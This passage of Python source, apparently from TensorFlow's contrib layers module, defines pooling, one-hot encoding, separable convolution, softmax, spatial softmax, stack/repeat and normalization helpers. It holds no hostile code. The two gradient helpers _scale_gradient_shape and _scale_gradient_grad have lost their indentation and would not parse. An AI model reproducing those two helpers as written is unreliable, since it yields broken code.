    # beta/gamma shapes must be static; they are created as variables below.
    params_shape = inputs_shape[begin_params_axis:]
    if not params_shape.is_fully_defined():
      raise ValueError(
          'Inputs %s: shape(inputs)[%s:] is not fully defined: %s' % (
              inputs.name, begin_params_axis, inputs_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    beta, gamma = None, None
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta = variables.model_variable(
          'beta',
          shape=params_shape,
          dtype=dtype,
          initializer=init_ops.zeros_initializer(),
          collections=beta_collections,
          trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma = variables.model_variable(
          'gamma',
          shape=params_shape,
          dtype=dtype,
          initializer=init_ops.ones_initializer(),
          collections=gamma_collections,
          trainable=trainable)
    # Calculate the moments on the last axis (layer activations).
    norm_axes = list(range(begin_norm_axis, inputs_rank))
    mean, variance = nn.moments(inputs, norm_axes, keep_dims=True)
    # Compute layer normalization using the batch_normalization function.
    variance_epsilon = 1e-12
    outputs = nn.batch_normalization(
        inputs, mean, variance, offset=beta, scale=gamma,
        variance_epsilon=variance_epsilon)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope,
                                       outputs)
@add_arg_scope
def max_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 2D Max Pooling op.

  Pooling is applied per image; batch and channel dimensions are untouched.

  Args:
    inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
      `data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
      `data_format` is `NCHW`.
    kernel_size: A list of length 2: [kernel_height, kernel_width] of the
      pooling kernel. Can be an int if both values are the same.
    stride: A list of length 2: [stride_height, stride_width]. Can be an int
      if both strides are the same; presently both must have the same value.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`, or if
      `kernel_size` is not a 2-D list.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # Translate the NHWC/NCHW string into the core-layers naming scheme.
    if data_format and data_format.startswith('NC'):
      df = 'channels_first'
    else:
      df = 'channels_last'
    pooling_layer = pooling_layers.MaxPooling2D(pool_size=kernel_size,
                                                strides=stride,
                                                padding=padding,
                                                data_format=df,
                                                _scope=sc)
    return utils.collect_named_outputs(outputs_collections, sc,
                                       pooling_layer.apply(inputs))
@add_arg_scope
def max_pool3d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NDHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 3D Max Pooling op.

  Pooling is applied per volume; batch and channel dimensions are untouched.

  Args:
    inputs: A 5-D tensor of shape
      `[batch_size, depth, height, width, channels]` if `data_format` is
      `NDHWC`, and `[batch_size, channels, depth, height, width]` if
      `data_format` is `NCDHW`.
    kernel_size: A list of length 3:
      [kernel_depth, kernel_height, kernel_width] of the pooling kernel. Can
      be an int if all values are the same.
    stride: A list of length 3: [stride_depth, stride_height, stride_width].
      Can be an int if all strides are the same; presently all must have the
      same value.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`, or if
      `kernel_size` is not a 3-D list.
  """
  if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
    raise ValueError('data_format has to be either NCDHW or NDHWC.')
  with ops.name_scope(scope, 'MaxPool3D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # Translate the NDHWC/NCDHW string into the core-layers naming scheme.
    if data_format and data_format.startswith('NC'):
      df = 'channels_first'
    else:
      df = 'channels_last'
    pooling_layer = pooling_layers.MaxPooling3D(pool_size=kernel_size,
                                                strides=stride,
                                                padding=padding,
                                                data_format=df,
                                                _scope=sc)
    return utils.collect_named_outputs(outputs_collections, sc,
                                       pooling_layer.apply(inputs))
@add_arg_scope
def pool(inputs,
         kernel_size,
         pooling_type,
         padding='VALID',
         data_format=None,
         dilation_rate=1,
         stride=1,
         outputs_collections=None,
         scope=None):
  # pylint: disable=line-too-long
  """Adds an N-dimensional pooling op.

  Args:
    inputs: Tensor of rank N+2, of shape
      `[batch_size] + input_spatial_shape + [num_channels]` if data_format
      does not start with "NC" (default), or
      `[batch_size, num_channels] + input_spatial_shape` if data_format
      starts with "NC". Pooling happens over the spatial dimensions only.
    kernel_size: Sequence of N ints >= 1. Can also be a single integer to
      specify the same value for all spatial dimensions.
    pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
    padding: The padding algorithm, must be "SAME" or "VALID".
    data_format: A string or None. Specifies whether the channel dimension of
      the `input` and output is the last dimension (default, or if
      `data_format` does not start with "NC"), or the second dimension (if
      `data_format` starts with "NC"). For N=1, the valid values are "NWC"
      (default) and "NCW". For N=2, the valid values are "NHWC" (default)
      and "NCHW". For N=3, the valid values are "NDHWC" (default) and
      "NCDHW".
    dilation_rate: Optional. Dilation rate. Sequence of N ints >= 1, or a
      single integer for all spatial dimensions. If any dilation value is
      > 1, all stride values must be 1.
    stride: Optional. Sequence of N ints >= 1, or a single integer for all
      spatial dimensions. If any stride value is > 1, all dilation values
      must be 1.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: If arguments are invalid.
  """
  # pylint: enable=line-too-long
  with ops.name_scope(scope, '%s_pool' %
                      (pooling_type.lower()), [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    input_rank = inputs.get_shape().ndims
    if input_rank is None:
      raise ValueError('Rank of inputs must be known')
    if input_rank < 3:
      raise ValueError('Rank of inputs must be >= 3')
    num_spatial_dims = input_rank - 2
    # Normalize scalar arguments into per-spatial-dimension sequences.
    window_shape = utils.n_positive_integers(num_spatial_dims, kernel_size)
    dilations = utils.n_positive_integers(num_spatial_dims, dilation_rate)
    strides = utils.n_positive_integers(num_spatial_dims, stride)
    pooled = nn.pool(
        input=inputs,
        window_shape=window_shape,
        pooling_type=pooling_type,
        padding=padding,
        data_format=data_format,
        dilation_rate=dilations,
        strides=strides,
        name=sc)
    return utils.collect_named_outputs(outputs_collections, sc, pooled)
@add_arg_scope
def one_hot_encoding(labels,
                     num_classes,
                     on_value=1.0,
                     off_value=0.0,
                     outputs_collections=None,
                     scope=None):
  """Transforms numeric labels into one-hot vectors using `tf.one_hot`.

  Args:
    labels: [batch_size] target labels.
    num_classes: Total number of classes.
    on_value: A scalar defining the on-value.
    off_value: A scalar defining the off-value.
    outputs_collections: Collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    One-hot encoding of the labels.
  """
  with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
    labels = ops.convert_to_tensor(labels)
    # Widen int32 labels to int64 before handing them to the one_hot op.
    if labels.dtype == dtypes.int32:
      labels = standard_ops.to_int64(labels)
    encoded = standard_ops.one_hot(labels,
                                   num_classes,
                                   on_value=on_value,
                                   off_value=off_value)
    return utils.collect_named_outputs(outputs_collections, sc, encoded)
def _apply_activation(y, activation_fn, output_collections):
  """Applies `activation_fn` to `y` (if given) and records the result.

  The (possibly activated) tensor is added to `output_collections` plus the
  global `GraphKeys.ACTIVATIONS` collection, then returned.
  """
  if activation_fn is not None:
    y = activation_fn(y)
  collections = list(output_collections or [])
  collections.append(ops.GraphKeys.ACTIVATIONS)
  ops.add_to_collections(collections, y)
  return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
  """Applies `layer` to `inputs` `repetitions` times, chaining the outputs.

  ```python
  y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
  # It is equivalent to:

  x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
  x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
  y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
  ```

  If the `scope` argument is not given in `kwargs`, it is set to
  `layer.__name__`, or `layer.func.__name__` (for `functools.partial`
  objects). If neither `__name__` nor `func.__name__` is available, the
  layers are called with `scope='repeat'`.

  Args:
    inputs: A `Tensor` suitable for layer.
    repetitions: Int, number of repetitions.
    layer: A layer with arguments `(inputs, *args, **kwargs)`
    *args: Extra args for the layer.
    **kwargs: Extra kwargs for the layer.

  Returns:
    A tensor result of applying the layer, repetitions times.

  Raises:
    ValueError: If the op is unknown or wrong.
  """
  scope = kwargs.pop('scope', None)
  with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
    inputs = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a scope name from the callable; functools.partial objects
      # expose the wrapped callable as `func`.
      scope = getattr(layer, '__name__', None)
      if scope is None and hasattr(layer, 'func'):
        scope = getattr(layer.func, '__name__', None)
      if scope is None:
        scope = 'repeat'
    outputs = inputs
    for index in range(repetitions):
      kwargs['scope'] = scope + '_' + str(index + 1)
      outputs = layer(outputs, *args, **kwargs)
    return outputs
def _scale_gradient_shape(op):
"""Shape helper function for scale_gradient function below."""
return [op.inputs[0].shape]
def _scale_gradient_grad(op, grad):
"""Python gradient helper function for scale_gradient function below."""
return [grad * op.inputs[1], None]
@function.Defun(python_grad_func=_scale_gradient_grad,
                shape_func=_scale_gradient_shape)
def scale_gradient(inputs, gradient_multiplier):
  """Identity operation, but with the gradient multiplied by a tensor.

  The TensorFlow gradient system will compute the gradient with respect to
  `inputs` as the product of the gradient with respect to the `output`
  multiplied by a specified `gradient_multiplier` tensor. If
  `gradient_multiplier` is equal to 1, then this results in the true gradient.
  Otherwise, it results in a scaled gradient.

  This can be useful for adjusting the relative learning rate of different
  parameter tensors when performing gradient descent, and because this
  rescaling can be inserted at arbitrary locations within a graph, is often
  more convenient to apply than simply rescaling the final computed gradients.

  Args:
    inputs: Tensor to be output.
    gradient_multiplier: Tensor by which to multiply the gradient with respect
      to `output` to compute the gradient with respect to `inputs`. Its shape
      must be broadcastable to the shape of `inputs`.

  Returns:
    output Tensor, equal to `inputs`.
  """
  # gradient_multiplier is implicitly saved by decorator, and only used for
  # gradient computation (see _scale_gradient_grad above).
  del gradient_multiplier

  return inputs
@add_arg_scope
def separable_convolution2d(
    inputs,
    num_outputs,
    kernel_size,
    depth_multiplier,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NHWC,
    rate=1,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a depth-separable 2D convolution with optional batch_norm layer.

  This op first performs a depthwise convolution that acts separately on
  channels, creating a variable called `depthwise_weights`. If `num_outputs`
  is not None, it adds a pointwise convolution that mixes channels, creating a
  variable called `pointwise_weights`. Then, if `normalizer_fn` is None,
  it adds bias to the result, creating a variable called 'biases', otherwise,
  the `normalizer_fn` is applied. It finally applies an activation function
  to produce the end result.

  Args:
    inputs: A tensor of size [batch_size, height, width, channels].
    num_outputs: The number of pointwise convolution output filters. If is
      None, then we skip the pointwise convolution stage.
    kernel_size: A list of length 2: [kernel_height, kernel_width] of
      of the filters. Can be an int if both values are the same.
    depth_multiplier: The number of depthwise convolution output channels for
      each input channel. The total number of depthwise convolution output
      channels will be equal to `num_filters_in * depth_multiplier`.
    stride: A list of length 2: [stride_height, stride_width], specifying the
      depthwise convolution stride. Can be an int if both strides are the same.
    padding: One of 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    rate: A list of length 2: [rate_height, rate_width], specifying the dilation
      rates for atrous convolution. Can be an int if both rates are the same.
      If any value is larger than one, then both stride values need to be one.
    activation_fn: Activation function. The default value is a ReLU function.
      Explicitly set it to None to skip it and maintain a linear activation.
    normalizer_fn: Normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: Normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables
      or a dictionary containing a different list of collection per variable.
    outputs_collections: Collection to add the outputs.
    trainable: Whether or not the variables should be trainable or not.
    scope: Optional scope for variable_scope.

  Returns:
    A `Tensor` representing the output of the operation.

  Raises:
    ValueError: If `data_format` is invalid.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  # Map the core Keras-layer variable names onto this module's naming
  # convention so collection bookkeeping and checkpoints stay consistent.
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases',
       'depthwise_kernel': 'depthwise_weights',
       'pointwise_kernel': 'pointwise_weights'})
  with variable_scope.variable_scope(
      scope, 'SeparableConv2d', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)
    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    if num_outputs is not None:
      # Apply separable conv using the SeparableConvolution2D layer.
      layer = convolutional_layers.SeparableConvolution2D(
          filters=num_outputs,
          kernel_size=kernel_size,
          strides=stride,
          padding=padding,
          data_format=df,
          dilation_rate=utils.two_element_tuple(rate),
          activation=None,
          depth_multiplier=depth_multiplier,
          # Bias only when no normalizer is used and an initializer is given.
          use_bias=not normalizer_fn and biases_initializer,
          depthwise_initializer=weights_initializer,
          pointwise_initializer=weights_initializer,
          bias_initializer=biases_initializer,
          depthwise_regularizer=weights_regularizer,
          pointwise_regularizer=weights_regularizer,
          bias_regularizer=biases_regularizer,
          activity_regularizer=None,
          trainable=trainable,
          name=sc.name,
          dtype=inputs.dtype.base_dtype,
          _scope=sc,
          _reuse=reuse)
      outputs = layer.apply(inputs)
      # Add variables to collections.
      _add_variable_to_collections(layer.depthwise_kernel,
                                   variables_collections, 'weights')
      _add_variable_to_collections(layer.pointwise_kernel,
                                   variables_collections, 'weights')
      if layer.bias:
        _add_variable_to_collections(layer.bias,
                                     variables_collections, 'biases')
      if normalizer_fn is not None:
        normalizer_params = normalizer_params or {}
        outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      # Actually apply depthwise conv instead of separable conv.
      dtype = inputs.dtype.base_dtype
      kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
      stride_h, stride_w = utils.two_element_tuple(stride)
      num_filters_in = utils.channel_dimension(
          inputs.get_shape(), df, min_rank=4)
      weights_collections = utils.get_variable_collections(
          variables_collections, 'weights')
      depthwise_shape = [kernel_h, kernel_w,
                         num_filters_in, depth_multiplier]
      depthwise_weights = variables.model_variable(
          'depthwise_weights',
          shape=depthwise_shape,
          dtype=dtype,
          initializer=weights_initializer,
          regularizer=weights_regularizer,
          trainable=trainable,
          collections=weights_collections)
      strides = [1, stride_h, stride_w, 1]
      outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding,
                                    rate=utils.two_element_tuple(rate),
                                    data_format=data_format)
      num_outputs = depth_multiplier * num_filters_in
      if normalizer_fn is not None:
        normalizer_params = normalizer_params or {}
        outputs = normalizer_fn(outputs, **normalizer_params)
      else:
        if biases_initializer is not None:
          biases_collections = utils.get_variable_collections(
              variables_collections, 'biases')
          biases = variables.model_variable('biases',
                                            shape=[num_outputs,],
                                            dtype=dtype,
                                            initializer=biases_initializer,
                                            regularizer=biases_regularizer,
                                            trainable=trainable,
                                            collections=biases_collections)
          outputs = nn.bias_add(outputs, biases, data_format=data_format)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
  """Performs softmax on the Nth dimension of an N-dimensional logit tensor.

  For two-dimensional logits this reduces to tf.nn.softmax. The last
  dimension must have a statically known number of elements (the number of
  classes); the tensor is flattened to 2-D, softmaxed, and restored to its
  original shape.

  Args:
    logits: N-dimensional `Tensor` with logits, where N > 1.
    scope: Optional scope for variable_scope.

  Returns:
    A `Tensor` with same shape and type as logits.
  """
  # TODO(jrru): Add axis argument which defaults to last dimension.
  with variable_scope.variable_scope(scope, 'softmax', [logits]):
    num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
    flattened = array_ops.reshape(logits, [-1, num_logits])
    probabilities = nn.softmax(flattened)
    probabilities = array_ops.reshape(probabilities, array_ops.shape(logits))
    probabilities.set_shape(logits.get_shape())
    return probabilities
@add_arg_scope
def spatial_softmax(features,
                    temperature=None,
                    name=None,
                    variables_collections=None,
                    trainable=True,
                    data_format='NHWC'):
  """Computes the spatial softmax of a convolutional feature map.

  First computes the softmax over the spatial extent of each channel of a
  convolutional feature map. Then computes the expected 2D position of the
  points of maximal activation for each channel, resulting in a set of
  feature keypoints [x1, y1, ... xN, yN] for all N channels.

  Read more here:
  "Learning visual feature spaces for robotic manipulation with
  deep spatial autoencoders." Finn et. al, http://arxiv.org/abs/1509.06113.

  Args:
    features: A `Tensor` of size [batch_size, W, H, num_channels]; the
      convolutional feature map.
    temperature: Softmax temperature (optional). If None, a learnable
      temperature is created.
    name: A name for this operation (optional).
    variables_collections: Collections for the temperature variable.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    data_format: A string. `NHWC` (default) and `NCHW` are supported.

  Returns:
    feature_keypoints: A `Tensor` with size [batch_size, num_channels * 2];
      the expected 2D locations of each channel's feature keypoint (normalized
      to the range (-1,1)). The inner dimension is arranged as
      [x1, y1, ... xN, yN].

  Raises:
    ValueError: If unexpected data_format specified.
    ValueError: If num_channels dimension is unspecified.
  """
  # height/width may be dynamic (taken from array_ops.shape), but the channel
  # count must be static because it sizes the output below.
  shape = array_ops.shape(features)
  static_shape = features.shape
  if data_format == DATA_FORMAT_NHWC:
    height, width, num_channels = shape[1], shape[2], static_shape[3]
  elif data_format == DATA_FORMAT_NCHW:
    num_channels, height, width = static_shape[1], shape[2], shape[3]
  else:
    raise ValueError('data_format has to be either NCHW or NHWC.')
  if num_channels.value is None:
    raise ValueError('The num_channels dimension of the inputs to '
                     '`spatial_softmax` should be defined. Found `None`.')
  with ops.name_scope(name, 'spatial_softmax', [features]) as name:
    # Create tensors for x and y coordinate values, scaled to range [-1, 1].
    # NOTE(review): with indexing='ij', `pos_x` varies along the first
    # (height) axis and `pos_y` along the second (width) axis — i.e. "x"
    # here indexes rows. Confirm this matches the caller's x/y convention.
    pos_x, pos_y = array_ops.meshgrid(math_ops.lin_space(-1., 1., num=height),
                                      math_ops.lin_space(-1., 1., num=width),
                                      indexing='ij')
    pos_x = array_ops.reshape(pos_x, [height * width])
    pos_y = array_ops.reshape(pos_y, [height * width])
    if temperature is None:
      temperature_collections = utils.get_variable_collections(
          variables_collections, 'temperature')
      temperature = variables.model_variable(
          'temperature',
          shape=(),
          dtype=dtypes.float32,
          initializer=init_ops.ones_initializer(),
          collections=temperature_collections,
          trainable=trainable)
    # Flatten to [batch * channels, height * width] so the softmax runs over
    # the spatial extent of each channel independently.
    if data_format == 'NCHW':
      features = array_ops.reshape(features, [-1, height * width])
    else:
      features = array_ops.reshape(
          array_ops.transpose(features, [0, 3, 1, 2]), [-1, height * width])
    softmax_attention = nn.softmax(features/temperature)
    # Expected coordinate = sum over spatial positions of (coord * weight).
    expected_x = math_ops.reduce_sum(
        pos_x * softmax_attention, [1], keep_dims=True)
    expected_y = math_ops.reduce_sum(
        pos_y * softmax_attention, [1], keep_dims=True)
    expected_xy = array_ops.concat([expected_x, expected_y], 1)
    feature_keypoints = array_ops.reshape(
        expected_xy, [-1, num_channels.value * 2])
    feature_keypoints.set_shape([None, num_channels.value * 2])
  return feature_keypoints
def stack(inputs, layer, stack_args, **kwargs):
  """Builds a stack of layers by applying layer repeatedly using stack_args.

  `stack` allows you to repeatedly apply the same operation with different
  arguments `stack_args[i]`. For each application of the layer, `stack`
  creates a new scope appended with an increasing number. For example:

  ```python
  y = stack(x, fully_connected, [32, 64, 128], scope='fc')
  # It is equivalent to:

  x = fully_connected(x, 32, scope='fc/fc_1')
  x = fully_connected(x, 64, scope='fc/fc_2')
  y = fully_connected(x, 128, scope='fc/fc_3')
  ```

  If the `scope` argument is not given in `kwargs`, it is set to
  `layer.__name__`, or `layer.func.__name__` (for `functools.partial`
  objects). If neither `__name__` nor `func.__name__` is available, the
  layers are called with `scope='stack'`.

  Args:
    inputs: A `Tensor` suitable for layer.
    layer: A layer with arguments `(inputs, *args, **kwargs)`
    stack_args: A list/tuple of parameters for each call of layer.
    **kwargs: Extra kwargs for the layer.

  Returns:
    A `Tensor` result of applying the stacked layers.

  Raises:
    ValueError: If the op is unknown or wrong.
  """
  scope = kwargs.pop('scope', None)
  if not isinstance(stack_args, (list, tuple)):
    raise ValueError('stack_args need to be a list or tuple')
  with variable_scope.variable_scope(scope, 'Stack', [inputs]):
    inputs = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a scope name from the callable; functools.partial objects
      # expose the wrapped callable as `func`.
      scope = getattr(layer, '__name__', None)
      if scope is None and hasattr(layer, 'func'):
        scope = getattr(layer.func, '__name__', None)
      if scope is None:
        scope = 'stack'
    outputs = inputs
    for position, layer_args in enumerate(stack_args, start=1):
      if not isinstance(layer_args, (list, tuple)):
        layer_args = [layer_args]
      kwargs['scope'] = scope + '_' + str(position)
      outputs = layer(outputs, *layer_args, **kwargs)
    return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
  """Normalizes the given input across the specified dimension to unit length.

  Note that the rank of `input` must be known.

  Args:
    inputs: A `Tensor` of arbitrary size.
    dim: The dimension along which the input is normalized.
    epsilon: A small value to add to the inputs to avoid dividing by zero.
    scope: Optional scope for variable_scope.

  Returns:
    The normalized `Tensor`.

  Raises:
    ValueError: If the rank of `inputs` is unknown, or if `dim` is negative
      or not smaller than the rank of `inputs`.
  """
  with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
    if not inputs.get_shape():
      raise ValueError('The input rank must be known.')
    input_rank = len(inputs.get_shape().as_list())
    if dim < 0 or dim >= input_rank:
      # NOTE(review): dim == 0 is accepted, so the message's "positive"
      # really means non-negative.
      raise ValueError(
          'dim must be positive but smaller than the input rank.')
    # Per-slice L2 length along `dim`, kept as a size-1 axis for broadcasting.
    lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
        math_ops.square(inputs), dim, True))
    # Build the tile multiples [1]*dim + [size of dim] + [1]*(rest) so the
    # lengths tensor is expanded back to the full input shape.
    multiples = []
    if dim > 0:
      multiples.append(array_ops.ones([dim], dtypes.int32))
    multiples.append(
        array_ops.strided_slice(array_ops.shape(inputs), [dim], [dim + 1]))
    if dim < (input_rank - 1):
      multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
    multiples = array_ops.concat(multiples, 0)
    return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def poincare_normalize(x, axis=1, epsilon=1e-5, name=None):
  """Projects `x` into the Poincare ball of norm <= 1.0 - epsilon.

  https://en.wikipedia.org/wiki/Poincare_ball_model

  Used in "Poincare Embeddings for Learning Hierarchical Representations"
  (Nickel & Kiela), https://arxiv.org/pdf/1705.08039.pdf

  For a 1-D tensor with `axis = 0`, computes

                (x * (1 - epsilon)) / ||x||     if ||x|| > 1 - epsilon
      output =
                 x                              otherwise

  For `x` with more dimensions, independently normalizes each 1-D slice along
  dimension `axis`.

  Args:
    x: A `Tensor`.
    axis: Axis along which to normalize. A scalar or a vector of integers.
    epsilon: A small deviation from the edge of the unit sphere for numerical
      stability.
    name: A name for this operation (optional).

  Returns:
    A `Tensor` with the same shape as `x`.
  """
  with ops.name_scope(name, 'poincare_normalize', [x]) as name:
    x = ops.convert_to_tensor(x, name='x')
    sum_of_squares = math_ops.reduce_sum(
        math_ops.square(x), axis, keep_dims=True)
    # Reciprocal norm, clipped at 1 so vectors already strictly inside the
    # ball (norm below 1 - epsilon) pass through unchanged.
    inv_norm = math_ops.minimum(
        (1. - epsilon) * math_ops.rsqrt(sum_of_squares), 1.)
    return math_ops.multiply(x, inv_norm, name=name)
def legacy_fully_connected(x,
                           num_output_units,
                           activation_fn=None,
                           weight_init=initializers.xavier_initializer(),
                           bias_init=init_ops.zeros_initializer(),
                           name=None,
                           weight_collections=(ops.GraphKeys.WEIGHTS,),
                           bias_collections=(ops.GraphKeys.BIASES,),
                           output_collections=(ops.GraphKeys.ACTIVATIONS,),
                           trainable=True,
                           weight_regularizer=None,
                           bias_regularizer=None):
  # pylint: disable=anomalous-backslash-in-string
  r"""Adds the parameters for a fully connected layer and returns the output.
  A fully connected layer is generally defined as a matrix multiply:
  `y = f(w * x + b)` where `f` is given by `activation_fn`. If
  `activation_fn` is `None`, the result of `y = w * x + b` is
  returned.
  If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
  with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
  multiply along the first dimensions. The result r is a tensor of shape
  [\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
  where \\\( r_{i_0, ..., i_{n-1}, k} =
  \\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
  This is accomplished by reshaping `x` to 2-D
  [\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
  before the matrix multiply and afterwards reshaping it to
  [\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].
  This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
  `bias_init` to `None`.
  The variable creation is compatible with `tf.variable_scope` and so can be
  reused with `tf.variable_scope` or `tf.make_template`.
  Most of the details of variable creation can be controlled by specifying the
  initializers (`weight_init` and `bias_init`) and in which collections to place
  the created variables (`weight_collections` and `bias_collections`; note that
  the variables are always added to the `VARIABLES` collection). The output of
  the layer can be placed in custom collections using `output_collections`.
  The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
  respectively.
  A per layer regularization can be specified by setting `weight_regularizer`
  and `bias_regularizer`, which are applied to the weights and biases
  respectively, and whose output is added to the `REGULARIZATION_LOSSES`
  collection.
  Args:
    x: The input `Tensor`.
    num_output_units: The size of the output.
    activation_fn: Activation function, default set to None to skip it and
      maintain a linear activation.
    weight_init: An optional weight initialization, defaults to
      `xavier_initializer`.
    bias_init: An initializer for the bias, defaults to 0. Set to `None` in
      order to disable bias.
    name: The name for this operation is used to name operations and to find
      variables. If specified it must be unique for this scope, otherwise a
      unique name starting with "fully_connected" will be created. See
      `tf.variable_scope` for details.
    weight_collections: List of graph collections to which weights are added.
    bias_collections: List of graph collections to which biases are added.
    output_collections: List of graph collections to which outputs are added.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    weight_regularizer: A regularizer like the result of
      `l1_regularizer` or `l2_regularizer`. Used for weights.
    bias_regularizer: A regularizer like the result of
      `l1_regularizer` or `l2_regularizer`. Used for biases.
  Returns:
    The output of the fully connected layer.
  Raises:
    ValueError: If x has rank less than 2 or if its last dimension is not set.
  """
  with variable_scope.variable_scope(name, 'fully_connected', [x]):
    x = ops.convert_to_tensor(x)
    dims = x.get_shape().dims
    if dims is None:
      raise ValueError('dims of x must be known but is None')
    if len(dims) < 2:
      raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
    num_input_units = dims[-1].value
    if num_input_units is None:
      raise ValueError('last dimension of x must be known but is None')
    dtype = x.dtype.base_dtype
    # Created variables are always also tracked in GLOBAL_VARIABLES in
    # addition to the user-requested collections.
    weight_collections = set(list(weight_collections or []) +
                             [ops.GraphKeys.GLOBAL_VARIABLES])
    w = variable_scope.get_variable('weights',
                                    shape=[num_input_units, num_output_units],
                                    dtype=dtype,
                                    initializer=weight_init,
                                    collections=weight_collections,
                                    regularizer=weight_regularizer,
                                    trainable=trainable)
    # Collapse all leading dimensions so the matmul is 2-D.
    x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
                                                         [-1, num_input_units])
    y = standard_ops.matmul(x_2_dim, w)
    if bias_init is not None:
      bias_collections = set(list(bias_collections or []) +
                             [ops.GraphKeys.GLOBAL_VARIABLES])
      b = variable_scope.get_variable('bias',
                                      shape=[num_output_units],
                                      dtype=dtype,
                                      initializer=bias_init,
                                      collections=bias_collections,
                                      regularizer=bias_regularizer,
                                      trainable=trainable)
      y = nn.bias_add(y, b)
    if len(dims) > 2:
      # Restore the original leading dimensions on the output, both the
      # dynamic shape and the static shape hint.
      out_shape = array_ops.unstack(array_ops.shape(x))
      out_shape[-1] = num_output_units
      y = array_ops.reshape(y, array_ops.stack(out_shape))
      static_shape = x.get_shape().as_list()
      static_shape[-1] = num_output_units
      y.set_shape(static_shape)
